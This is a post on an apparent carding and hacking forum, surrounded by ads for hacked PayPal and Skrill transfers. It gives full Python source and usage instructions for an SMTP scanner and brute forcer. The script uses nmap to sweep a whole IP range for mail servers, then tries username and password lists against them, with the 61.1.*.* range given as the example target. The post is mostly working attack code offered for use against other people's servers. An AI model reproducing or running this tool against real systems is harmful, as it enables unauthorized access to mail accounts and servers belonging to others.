We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
[Python] SMTP Scanner/Brute Forcer

#1
To make brute.py run you need to make it executable so u gotta do chmod +x brute.py
after that u can run it like this in below Grin

Code:
[user:js@linuxbox ~]$ python brute.py 61.1.*.* userlist.txt passwordlist.txt

d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0
--------------------------------------------------

[+] Scanning: 61.1.*.*
[+] Users Loaded: 182
[+] Words Loaded: 53


This will scan the whole 61.1 range, u can adjust this as u like...... i sorted out the username and password list from the most common brute forces, so u can leave that as it is.

Code:
#!usr/bin/python
#Smtp Brute Forcer, searches ip_range for hosts using smtp.
#[Doar userii inregistrati pot vedea linkurile. ]
#d3hydr8[at]gmail[dot]com

import threading, time, StringIO, commands, random, sys, smtplib, re, socket
from smtplib import SMTP
from copy import copy

if len(sys.argv) !=4:
    print "Usage: ./smtpbrute_iprange.py <ip_range> <userlist> <wordlist>"
    sys.exit(1)

try:
      users = open(sys.argv[2], "r").readlines()
except(IOError):
      print "Error: Check your userlist path\n"
      sys.exit(1)
  
try:
      words = open(sys.argv[3], "r").readlines()
except(IOError):
      print "Error: Check your wordlist path\n"
      sys.exit(1)

print "\n\t   d3hydr8[at]gmail[dot]com smtpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)

wordlist = copy(words)

def scan():

    iprange = sys.argv[1]
    ip_list = []
    
    nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 25 | grep open -B 3')[1]).readlines()
    
    for tmp in nmap:
        ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
        if ipaddr:
                ip_list.append(ipaddr[0])
    return ip_list

def reloader():
    for word in wordlist:
        words.append(word)

def getword():
    lock = threading.Lock()
    lock.acquire()
    if len(words) != 0:
        value = random.sample(words,  1)
        words.remove(value[0])
        
    else:
        reloader()
        value = random.sample(words,  1)
        
    lock.release()
    return value[0][:-1]
        
class Workhorse(threading.Thread):
    
    def run(self):
        value = getword()
        try:
            print "-"*12
            print "User:",user[:-1],"Password:",value
            smtp = smtplib.SMTP(ip)
            smtp.login(user[:-1], value)
            print "\t\nLogin successful:",user, value
            smtp.quit()
            work.join()
            sys.exit(2)
        except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
            #print "An error occurred:", msg
            pass

ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
    print "\n\tAttempting BruteForce:",ip,"\n"
    try:    
        helo = smtplib.SMTP(ip)
        print helo.helo(), "\n"
        helo.quit()
    except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
        print "Server doesn't support the Helo cmd"
    for user in users:
        for i in range(len(words)):
            if i == 0: reloader()
            work = Workhorse()
            work.start()
            time.sleep(2)
Reply
Paid adv. expire in 47 days
CLICK to buy Advertisement !

    Verified & Trusted HACKED Payza, PayPal, Ukash, Ucard, EgoPay, Skrill - TRANSFER [Escrow accepted]




Forum Jump: